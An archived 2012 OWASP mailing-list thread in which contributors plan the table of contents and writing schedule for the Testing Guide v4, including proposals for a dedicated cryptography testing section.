[Owasp-testing] Testing Guide V4 - Start up

Ismael Rocha ismaelrocha.projetos at gmail.com
Tue Sep 4 21:39:11 UTC 2012


Hello.

I think maybe we should make a cross-reference between the ToC and the
Testing Cheat Sheet. It would help us to identify which aspects are covered
and which aren´t covered in the ToC.
For example: SSO is covered in the cheatsheet and not covered in the ToC.
Also HTTP DoS.
It also can give us some ideas about the names of the sections. If anybody
did it already I can do it.

Ismael Gonçalves

https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet

https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

On Tue, Sep 4, 2012 at 6:16 PM, Simone Onofri <simone.onofri at gmail.com>wrote:

> On Tue, Sep 4, 2012 at 11:13 PM, Ismael Rocha
> <ismaelrocha.projetos at gmail.com> wrote:
> > Hello.
>
> hi ismael,
>
> > As I mentioned some days ago, I suggested improve SSL Test maybe based no
> > Qualys SSLabs issues and other.
> >
> > "SSL Test
> >  -> Enhace (maybe based on Qualys SSLlabs  tests?)"
>
>
> +1, i also use it!
>
> > Still talking about "cryptography not used when necessary" I would say
> that
> > is important to cover aspects of technologies which use ViewState concept
> > (e.g. JSF, .NET).
>
> of couse!
>
>
> > Ismael Gonçalves
> >
> >
> > On Tue, Sep 4, 2012 at 5:42 PM, Simone Onofri <simone.onofri at gmail.com>
> > wrote:
> >>
> >> hi all,
> >>
> >> i see the question is "data encryption" covers transmission and storage
> >> both.
> >>
> >> historically two issues are divided. to brainstorming some stuff, also
> >> using the web application security testing checklist [1]:
> >>
> >>  - not used when necessary (e.g. for credential transportation or
> storage)
> >>  - algorithms
> >>    - weak/homebrew (e.g. on ssl or when developers uses weak
> >> algorithms to protect data)
> >>    - wrong context (e.g. symmetric encryption for password storage)
> >>    - improper usage (e.g. hashing without salting, kdf with less
> >> iterations)
> >>  - keys and secrets
> >>    - weak/short/guessable (e.g. also on ssl)
> >>  - entropy issues
> >>    - weak random generators
> >>    - ...
> >>
> >> ideas?
> >>
> >> s.
> >>
> >>
> >> [1]
> >>
> https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet
> >> On Tue, Sep 4, 2012 at 9:56 PM, Juan Galiana Lara <jgaliana at owasp.org>
> >> wrote:
> >> > +1!
> >> >
> >> > I think that is really important to cover.
> >> >
> >> > I've seen a new  "Testing for Data Encryption (New!)" under the data
> >> > validation section, but I would rather consider to have a main section
> >> > for
> >> > "Cryptography" at the same level of authentication, authorization,
> data
> >> > validation and so on.
> >> >
> >> > Cryptography is one of the most important topics in security and there
> >> > have
> >> > been quite significant crypto vulnerabilities applied to webapps like
> >> > the
> >> > padding oracle attack technique that was applied to decrypt HTTP
> cookies
> >> > in
> >> > several frameworks like ASP.NET, ROR and JSF two years back. Or the
> one
> >> > Eduardo mention, extension attacks due to improper or lack of use of
> >> > HMAC
> >> > algorithms, that is quite common.
> >> >
> >> > Actually, there are already few sections under DV in the new table of
> >> > contents, that would fit in that section:
> >> >
> >> > Testing for Data Encryption (New!)
> >> >
> >> > Application did not use encryption
> >> > Weak SSL/TSL Ciphers
> >> >
> >> > Insufficient Transport Layer Protection
> >> >
> >> > Insecure Cryptographic Storage [mainly CR Guide]
> >> >
> >> >
> >> > Thoughts?
> >> >
> >> >
> >> > --
> >> > Juan Galiana
> >> >
> >> >
> >> > On Tue, Sep 4, 2012 at 3:58 AM, Eduardo Castellanos <guayin at gmail.com
> >
> >> > wrote:
> >> >>
> >> >> Hello,
> >> >>
> >> >> What about a section for cryptographic attacks? Bad use of crypto
> >> >> functions in general. (Hash Length Extension, etc.) or would that be
> >> >> outside
> >> >> the scope of the guide?
> >> >>
> >> >> Related links:
> >> >>
> >> >> https://blog.whitehatsec.com/hash-length-extension-attacks/
> >> >> https://www.owasp.org/index.php/Category:Cryptographic_Vulnerability
> >> >>
> >> >>
> >> >>
> http://blogs.msdn.com/b/ace_team/archive/2008/11/13/vulnerabilities-due-to-improper-use-of-crypto-part-1.aspx
> >> >>
> >> >>
> >> >> Eduardo Castellanos N.
> >> >>
> >> >>
> >> >>
> >> >> On Mon, Sep 3, 2012 at 8:01 PM, Robert Winkel
> >> >> <robert.winkel at saltbushgroup.com> wrote:
> >> >>>
> >> >>> I have taken the liberty of assigning myself against several of the
> >> >>> Authentication Testing test cases.  I am happy to hand those over if
> >> >>> someone
> >> >>> is interested in be assigned to those instead.
> >> >>>
> >> >>> What happened to the Denial of Service test cases?
> >> >>>
> >> >>> Is there a template to adhere to when the writing stage begins?
> >> >>>
> >> >>> _______________________________________
> >> >>> Robert “Bull” Winkel
> >> >>> Director Saltbush Assurance
> >> >>> email: robert.winkel at saltbushgroup.com
> >> >>> http://www.linkedin.com/in/robertwinkel
> >> >>>
> >> >>>
> >> >>> -----Original Message-----
> >> >>> From: owasp-testing-bounces at lists.owasp.org
> >> >>> [mailto:owasp-testing-bounces at lists.owasp.org] On Behalf Of Matteo
> >> >>> Meucci
> >> >>> Sent: Friday, 31 August 2012 1:40 AM
> >> >>> To: owasp-testing at lists.owasp.org
> >> >>> Subject: [Owasp-testing] Testing Guide V4 - Start up
> >> >>>
> >> >>> Hi all Testing Guide contributors.
> >> >>>
> >> >>> Testing Guide v4 has been approved as Projects Reboot 2012!
> >> >>> https://www.owasp.org/index.php/Projects_Reboot_2012
> >> >>>
> >> >>> Here is the list of contributors I've collected:
> >> >>>
> >> >>> Pavol Luptak
> >> >>> Marco Morana
> >> >>> Giorgio Fedon
> >> >>> Stefano Di Paola
> >> >>> Gianrico Ingrosso
> >> >>> Giuseppe Bonfà
> >> >>> Roberto Suggi Liverani
> >> >>> Robert Smith
> >> >>> Andrew Muller
> >> >>> Robert Winkel
> >> >>> tripurari rai
> >> >>> Thomas Ryan
> >> >>> tim bertels
> >> >>> Cecil Su
> >> >>> Aung KhAnt
> >> >>> Norbert Szetei
> >> >>> michael.boman
> >> >>> Wagner Elias
> >> >>> Kevin Horvat
> >> >>> Juan Galiana Lara
> >> >>> Kenan Gursoy
> >> >>> Jason Flood
> >> >>> Javier Marcos de Prado
> >> >>> Sumit Siddharth
> >> >>> Mike Hryekewicz
> >> >>> psiinon
> >> >>> Ray Schippers
> >> >>> Raul Siles
> >> >>> Jayanta Karmakar
> >> >>> Brad Causey
> >> >>> Vicente Aguilera
> >> >>> Ismael Gonçalves
> >> >>>
> >> >>> Reviewers team:
> >> >>>
> >> >>> Paolo Perego
> >> >>> Daniel Cuthbert
> >> >>> Matthew Churcher
> >> >>> Lode Vanstechelman
> >> >>> Sebastien Gioria
> >> >>>
> >> >>>
> >> >>> Introduction and Project purpose for v4:
> >> >>> ============================ ============= The OWASP Testing Guide
> v3
> >> >>> includes a "best practice" penetration testing framework which users
> >> >>> can
> >> >>> implement in their own organizations and a "low level" penetration
> >> >>> testing
> >> >>> guide that describes techniques for testing most common web
> >> >>> application
> >> >>> and
> >> >>> web service security issues. Nowadays the Testing Guide has become
> the
> >> >>> standard to perform a Web Application Penetration Testing and many
> >> >>> Companies
> >> >>> all around the world have adopted it.
> >> >>> It is vital for the project mantaining an updated project that
> >> >>> represents
> >> >>> the state of the art for WebAppSec.
> >> >>>
> >> >>> Project Roadmap
> >> >>> =============
> >> >>>
> >> >>> - (1) 1st phase: Brainstorming and create a new table of contents
> >> >>>
> >> >>> Objective: creating a new table of contents of the OTGv4 assigning a
> >> >>> task
> >> >>> for each contributor.
> >> >>> I created a new OWASP Testing Guide v4 table of Contents here:
> >> >>>
> >> >>>
> https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
> >> >>>
> >> >>> - (2) 2nd phase:  Writing
> >> >>> 20th September 2012: Start writing the articles 1st November 2012:
> 1st
> >> >>> Draft
> >> >>> 30th November: end of writing phase
> >> >>>
> >> >>> - (3) 3rd phase: Reviewing
> >> >>>
> >> >>> - 1st December 2012: Starting the review phase,
> >> >>> - 15th December 2012: Create the RC1,
> >> >>> - 31st January 2013: Release the version 4.
> >> >>>
> >> >>> Timeline November 2012 1st Draft, January 2013 Final Release
> >> >>>
> >> >>> So, let's start discussion about phase (1)!
> >> >>>
> >> >>> Thanks!
> >> >>> Mat
> >> >>>
> >> >>> --
> >> >>> Matteo Meucci
> >> >>> OWASP Testing Guide Lead
> >> >>> OWASP-Italy President
> >> >>>
> >> >>>
> >> >>> _______________________________________________
> >> >>> Owasp-testing mailing list
> >> >>> Owasp-testing at lists.owasp.org
> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-testing
> >> >>>
> >> >>> _______________________________________________
> >> >>> Owasp-testing mailing list
> >> >>> Owasp-testing at lists.owasp.org
> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-testing
> >> >>
> >> >>
> >> >>
> >> >> _______________________________________________
> >> >> Owasp-testing mailing list
> >> >> Owasp-testing at lists.owasp.org
> >> >> https://lists.owasp.org/mailman/listinfo/owasp-testing
> >> >>
> >> >
> >> >
> >> > _______________________________________________
> >> > Owasp-testing mailing list
> >> > Owasp-testing at lists.owasp.org
> >> > https://lists.owasp.org/mailman/listinfo/owasp-testing
> >> >
> >> _______________________________________________
> >> Owasp-testing mailing list
> >> Owasp-testing at lists.owasp.org
> >> https://lists.owasp.org/mailman/listinfo/owasp-testing
> >
> >
> >
> >
> > --
> > Ismael Gonçalves
>



-- 
Ismael Gonçalves
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-testing/attachments/20120904/31d86727/attachment-0001.html>


More information about the Owasp-testing mailing list